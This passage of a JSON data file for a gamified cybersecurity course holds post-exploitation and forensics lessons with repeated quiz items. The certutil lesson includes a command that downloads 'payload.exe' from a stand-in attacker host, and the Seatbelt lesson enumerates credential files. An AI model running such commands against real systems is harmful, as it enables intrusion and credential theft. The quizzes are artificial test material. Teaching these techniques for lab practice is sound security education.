for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-px-sharphound","cat":"Post-Exploitation","title":"SharpHound Detailed Usage","diff":2,"xp":150,"intro":"Advanced BloodHound data collection options.","sections":[{"type":"text","content":"Advanced BloodHound data collection options."},{"type":"code","lang":"bash","content":"SharpHound.exe --CollectionMethods All\nSharpHound.exe --CollectionMethods Session,LocalAdmin\nSharpHound.exe --ExcludeDomainControllers\nSharpHound.exe --Stealth"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"--Stealth mode reduces...","opts":["Data quality","Detection by using fewer queries and avoiding DCs","Collection speed","Data volume"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-px-seatbelt","cat":"Post-Exploitation","title":"Seatbelt Host Enumeration","diff":2,"xp":150,"intro":"Comprehensive Windows host enumeration.","sections":[{"type":"text","content":"Comprehensive Windows host enumeration."},{"type":"code","lang":"bash","content":"Seatbelt.exe -group=all\nSeatbelt.exe -group=user\nSeatbelt.exe InterestingFiles\nSeatbelt.exe CredentialFiles"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Seatbelt collects...","opts":["Network data","Comprehensive host security info (creds, config, files)","Only processes","Only network"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-px-certutil","cat":"Post-Exploitation","title":"Certutil for Offense","diff":1,"xp":75,"intro":"Windows LOLBin for file transfer and encoding.","sections":[{"type":"text","content":"Windows LOLBin for file transfer and encoding."},{"type":"code","lang":"bash","content":"certutil -urlcache -split -f http://attacker/payload.exe C:payload.exe\ncertutil -encode payload.exe encoded.txt\ncertutil -decode encoded.txt payload.exe"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"certutil is a LOLBin because...","opts":["It's malware","It's a legitimate system tool abused for offensive purposes","It requires admin","It's hidden"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-fo-volatility-install","cat":"Forensics & IR","title":"Volatility Setup and Profiles","diff":1,"xp":75,"intro":"Install and configure Volatility for memory analysis.","sections":[{"type":"text","content":"Install and configure Volatility for memory analysis."},{"type":"code","lang":"bash","content":"pip install volatility3\nvol -f mem.dmp windows.info\n# Volatility 2 (legacy)\nvol.py -f mem.dmp imageinfo"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Volatility's first step is always...","opts":["Running malfind","Identifying the memory profile/OS version","Dumping hashes","Network scan"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-fo-plaso","cat":"Forensics & IR","title":"Plaso Super Timeline","diff":3,"xp":200,"intro":"Create a unified timeline from all artifact sources.","sections":[{"type":"text","content":"Create a unified timeline from all artifact sources."},{"type":"code","lang":"bash","content":"log2timeline.py timeline.plaso evidence.dd\npsort.py -o l2tcsv timeline.plaso -w timeline.csv"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Plaso combines timestamps from...","opts":["Only files","All artifact sources (files, registry, logs, browser, etc.)","Only event logs","Only registry"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-fo-photorec","cat":"Forensics & IR","title":"PhotoRec File Recovery","diff":1,"xp":75,"intro":"Recover deleted files from disk images.","sections":[{"type":"text","content":"Recover deleted files from disk images."},{"type":"code","lang":"bash","content":"photorec evidence.dd\n# Interactive: select partition, file types, output dir\n# Recovers: images, documents, archives, databases"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"PhotoRec recovers files by...","opts":["Filename search","Scanning for file headers (magic bytes) in raw data","Directory listing","Index search"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-fo-binwalk","cat":"Forensics & IR","title":"Binwalk Firmware Analysis","diff":2,"xp":150,"intro":"Extract embedded files and firmware components.","sections":[{"type":"text","content":"Extract embedded files and firmware components."},{"type":"code","lang":"bash","content":"binwalk firmware.bin\nbinwalk -e firmware.bin  # extract\nbinwalk --signature firmware.bin"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Binwalk extracts...","opts":["Network packets","Embedded filesystems and files from firmware images","Memory dumps","Registry hives"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-fo-exiftool","cat":"Forensics & IR","title":"EXIF Metadata Extraction","diff":1,"xp":75,"intro":"Extract metadata from images and documents.","sections":[{"type":"text","content":"Extract metadata from images and documents."},{"type":"code","lang":"bash","content":"exiftool photo.jpg\nexiftool -GPS* photo.jpg  # GPS coordinates\nexiftool -Author -Creator -Producer document.pdf"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write 